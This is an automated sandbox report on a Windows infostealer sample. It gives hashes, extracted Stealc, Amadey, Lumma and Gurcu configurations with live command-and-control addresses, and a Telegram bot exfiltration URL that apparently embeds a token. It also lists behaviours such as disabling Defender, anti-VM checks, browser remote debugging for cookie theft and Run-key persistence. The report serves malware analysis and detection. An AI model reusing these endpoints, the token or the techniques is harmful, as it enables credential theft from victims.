Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2024 09:28
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240903-en
General
-
Target
file.exe
-
Size
1.7MB
-
MD5
1b850dd61dfbb0fb8782987f0b6f365c
-
SHA1
a6d5c487ba7c8417ac4f2f6ab46a560f20ca404d
-
SHA256
a5e020f3d85998f530607c7e83d229449befec6e9800c5ae6f9cdd76659da0ef
-
SHA512
38da11e6e7e1c09d892cf79ee0c51a560f6caf7dc748c04200c5fb8dea3fad2b8f5d33041863bf4b9ee6e54b9dfaf57f823fd1c63c0147955952650b6e013c96
-
SSDEEP
49152:73VNOgSGRS4msDkbB/ILDKaT8X/5/8DYIi5huJEfexQPt:JyeS4ms42H5TU/h8DYIiuE2xQPt
Malware Config
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://powerful-avoids.sbs
https://motion-treesz.sbs
https://disobey-curly.sbs
https://leg-sate-boat.sbs
https://story-tense-faz.sbs
https://blade-govern.sbs
https://occupy-blushi.sbs
https://frogs-severz.sbs
https://salve-windp.cyou
Extracted
gurcu
https://api.telegram.org/bot7912788699:AAGD1HW4P2288HKKYEhpShtetd37D8GqFZo/sendDocument?chat_id=7781867830&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Signatures
-
Amadey family
-
Gurcu family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 38a103eec7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 38a103eec7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 38a103eec7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 38a103eec7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 38a103eec7.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 38a103eec7.exe -
Stealc family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 4caa2bc894.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7d827da348.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4caa2bc894.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8373d2c99b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 38a103eec7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ file.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ IEHJDGIDBA.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ befb3070da.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rhnew.exe -
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3500 msedge.exe 4112 msedge.exe 1712 msedge.exe 4136 chrome.exe 4004 chrome.exe 4860 chrome.exe 4048 msedge.exe 4552 chrome.exe 1500 chrome.exe 2932 msedge.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion befb3070da.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion befb3070da.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8373d2c99b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rhnew.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion IEHJDGIDBA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7d827da348.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4caa2bc894.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8373d2c99b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion IEHJDGIDBA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 38a103eec7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rhnew.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 38a103eec7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7d827da348.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4caa2bc894.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation IEHJDGIDBA.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation 4XYFk9r.exe -
Executes dropped EXE 12 IoCs
pid Process 3756 IEHJDGIDBA.exe 1768 skotes.exe 3540 GI59vO6.exe 412 4XYFk9r.exe 3820 skotes.exe 3184 7d827da348.exe 3360 4caa2bc894.exe 2824 befb3070da.exe 3888 8373d2c99b.exe 4664 255e8fdf1c.exe 4980 38a103eec7.exe 408 rhnew.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine rhnew.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 7d827da348.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 4caa2bc894.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine befb3070da.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 8373d2c99b.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 38a103eec7.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine file.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine IEHJDGIDBA.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe -
Loads dropped DLL 3 IoCs
pid Process 3100 file.exe 3100 file.exe 412 4XYFk9r.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 38a103eec7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 38a103eec7.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\befb3070da.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011947001\\befb3070da.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8373d2c99b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011948001\\8373d2c99b.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\255e8fdf1c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011949001\\255e8fdf1c.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\38a103eec7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011950001\\38a103eec7.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 88 raw.githubusercontent.com 89 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 100 ip-api.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000500000001e0ed-737.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 3100 file.exe 3756 IEHJDGIDBA.exe 1768 skotes.exe 3820 skotes.exe 3184 7d827da348.exe 3360 4caa2bc894.exe 2824 befb3070da.exe 3888 8373d2c99b.exe 4980 38a103eec7.exe 408 rhnew.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job IEHJDGIDBA.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 4896 3540 WerFault.exe 136 5788 2824 WerFault.exe 150 5812 2824 WerFault.exe 150 5896 2824 WerFault.exe 150 -
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7d827da348.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8373d2c99b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 255e8fdf1c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 38a103eec7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rhnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEHJDGIDBA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 255e8fdf1c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GI59vO6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4caa2bc894.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language befb3070da.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 255e8fdf1c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 15 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 4XYFk9r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString file.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 4XYFk9r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 2252 taskkill.exe 2392 taskkill.exe 428 taskkill.exe 3600 taskkill.exe 4080 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133777780941177162" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings firefox.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3100 file.exe 3100 file.exe 3100 file.exe 3100 file.exe 3100 file.exe 3100 file.exe 4136 chrome.exe 4136 chrome.exe 3100 file.exe 3100 file.exe 3100 file.exe 3100 file.exe 4052 msedge.exe 4052 msedge.exe 2000 msedge.exe 2000 msedge.exe 2000 msedge.exe 2000 msedge.exe 3500 msedge.exe 3500 msedge.exe 3100 file.exe 3100 file.exe 3100 file.exe 3100 file.exe 3756 IEHJDGIDBA.exe 3756 IEHJDGIDBA.exe 1768 skotes.exe 1768 skotes.exe 3540 GI59vO6.exe 3540 GI59vO6.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 3820 skotes.exe 3820 skotes.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 412 4XYFk9r.exe 3184 7d827da348.exe 3184 7d827da348.exe 412 4XYFk9r.exe 3360 4caa2bc894.exe 3360 4caa2bc894.exe 2824 befb3070da.exe 2824 befb3070da.exe 3360 4caa2bc894.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeShutdownPrivilege 4136 chrome.exe Token: SeCreatePagefilePrivilege 4136 chrome.exe Token: SeShutdownPrivilege 4136 chrome.exe Token: SeCreatePagefilePrivilege 4136 chrome.exe Token: SeShutdownPrivilege 4136 chrome.exe Token: SeCreatePagefilePrivilege 4136 chrome.exe Token: SeShutdownPrivilege 4136 chrome.exe Token: SeCreatePagefilePrivilege 4136 chrome.exe Token: SeShutdownPrivilege 4136 chrome.exe Token: SeCreatePagefilePrivilege 4136 chrome.exe Token: SeShutdownPrivilege 4136 chrome.exe Token: SeCreatePagefilePrivilege 4136 chrome.exe Token: SeShutdownPrivilege 4136 chrome.exe Token: SeCreatePagefilePrivilege 4136 chrome.exe Token: SeDebugPrivilege 412 4XYFk9r.exe Token: SeDebugPrivilege 2252 taskkill.exe Token: SeDebugPrivilege 2392 taskkill.exe Token: SeDebugPrivilege 428 taskkill.exe Token: SeDebugPrivilege 3600 taskkill.exe Token: SeDebugPrivilege 4080 taskkill.exe Token: SeDebugPrivilege 2588 firefox.exe Token: SeDebugPrivilege 2588 firefox.exe Token: SeDebugPrivilege 4980 38a103eec7.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 4136 chrome.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3756 IEHJDGIDBA.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe -
Suspicious use of SendNotifyMessage 30 IoCs
pid Process 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 2588 firefox.exe 4664 255e8fdf1c.exe 4664 255e8fdf1c.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2588 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3100 wrote to memory of 4136 3100 file.exe 83 PID 3100 wrote to memory of 4136 3100 file.exe 83 PID 4136 wrote to memory of 4888 4136 chrome.exe 84 PID 4136 wrote to memory of 4888 4136 chrome.exe 84 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 3560 4136 chrome.exe 85 PID 4136 wrote to memory of 756 4136 chrome.exe 86 PID 4136 wrote to memory of 756 4136 chrome.exe 86 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 PID 4136 wrote to memory of 3292 4136 chrome.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""2⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e021cc40,0x7ff8e021cc4c,0x7ff8e021cc583⤵PID:4888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:23⤵PID:3560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1656,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:33⤵PID:756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1908,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2224 /prefetch:83⤵PID:3292
-
-
